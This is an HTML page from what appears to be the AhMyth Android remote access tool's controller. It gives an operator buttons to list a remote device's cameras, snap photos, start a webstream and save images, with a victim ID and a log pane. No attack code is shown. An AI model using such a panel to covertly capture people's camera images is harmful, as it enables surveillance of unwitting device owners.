<!DOCTYPE html>
<html ng-app="myapp">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no" />

    <title>AhMyth</title>

    <!-- Insert this line above script imports  -->
    <script>
        if (typeof module === 'object') {
            window.module = module;
            module = undefined;
        }
    </script>

	<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.4/socket.io.js"></script>
    <script type="text/javascript" src="assets/js/lib/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="assets/js/semantic.min.js"></script>
    <script type="text/javascript" src="assets/js/angular.js"></script>
    <script type="text/javascript" src="assets/js/controllers/AppCtrl.js"></script>
	<script type="text/javascript" src="http://danml.com/js/download.js"></script>
	
    <!-- Insert this line after script imports -->
    <script>
        if (window.module) module = window.module;
    </script>

    <link rel="stylesheet" href="assets/css/mystyle.css">
    <link rel="stylesheet" href="assets/css/semantic.min.css" />

</head>

<body ng-controller="AppCtrl" class="draggable">
	<br>
	<button ng-click="getCamList();" class="ui labeled icon black  button"><i class="terminal icon" ></i>Get Cams</button>
	<br>
	<label>V-ID</label> : <label>{{vId}}</label>
	<br>
	<div class="ui grid center aligned h100">
        <div class="row h20">
            <div class="sixteen wide column">
                <select class="ui dropdown" ng-options="item.name for item in cameras" ng-model="selectedCam"></select>
                <button class="ui labeled icon black button" ng-click="snap()"><i class="photo icon"></i>Snap</button>
				<button class="ui labeled icon black button" ng-click="webstream()">webstream</button>
            </div>
        </div>
        <div class="row h80">
            <div class="sixteen wide column h100">
                <div class="ui h100 w100 image ">
                    <a class="ui red ribbon label" ng-show="isSaveShown" ng-click="savePhoto()">
                        <i class="save icon"></i> Save
                    </a>
                    <img style="height: 100%; width: 100%;" src="./assets/img/imageHolder.png" ng-src="{{imgUrl}}"></img>
                </div>
            </div>
        </div>
    </div>
	<br>
    <div class="ui bottom attached black message h25 notDraggable" id="log" style="overflow: scroll;margin-top: 16px;background-color: white !important; color: black !important;">
        <div ng-repeat="log in logs" class="log">
            <div class="w30" style="display: inline-block" ng-bind="log.date"></div>
            <div class="w65" style="display: inline-block" ng-style="{'color':log.color}" ng-bind="log.msg"></div>
        </div>
    </div>
</body>

</html>
